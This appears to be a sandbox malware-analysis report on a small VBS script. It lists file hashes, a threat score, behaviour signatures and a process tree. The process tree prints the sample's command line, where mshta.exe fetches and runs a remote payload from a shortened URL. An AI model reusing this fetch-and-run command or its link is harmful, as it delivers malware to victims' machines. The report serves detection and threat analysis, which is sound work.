Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    21-07-2021 15:30

General

  • Target

    N41101255652.vbs

  • Size

    222B

  • MD5

    56f4f81251a3d6a6e5c97546d7847b2e

  • SHA1

    bb5ff2453fc662f571aff2f530f6432ace23cc17

  • SHA256

    2b02f82aed2a34dafcb6e9419821f02387ad7fa26713822477e7d5260b5a9888

  • SHA512

    aa92f277440513b7e8b77c013fb41584eff6285313a9c17c16065af9b1158ef7eface5c57d65f25f480c7c764196e249dc09369ce44721a296d14e6692cc4ea9

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\N41101255652.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1756
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://bit.ly/3kKbYz1
      2⤵
      • Blocklisted process makes network request
      • Modifies Internet Explorer settings
      • Modifies system certificate store
      PID:2040

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1756-60-0x000007FEFBD21000-0x000007FEFBD23000-memory.dmp

    Filesize

    8KB

  • memory/2040-61-0x0000000000000000-mapping.dmp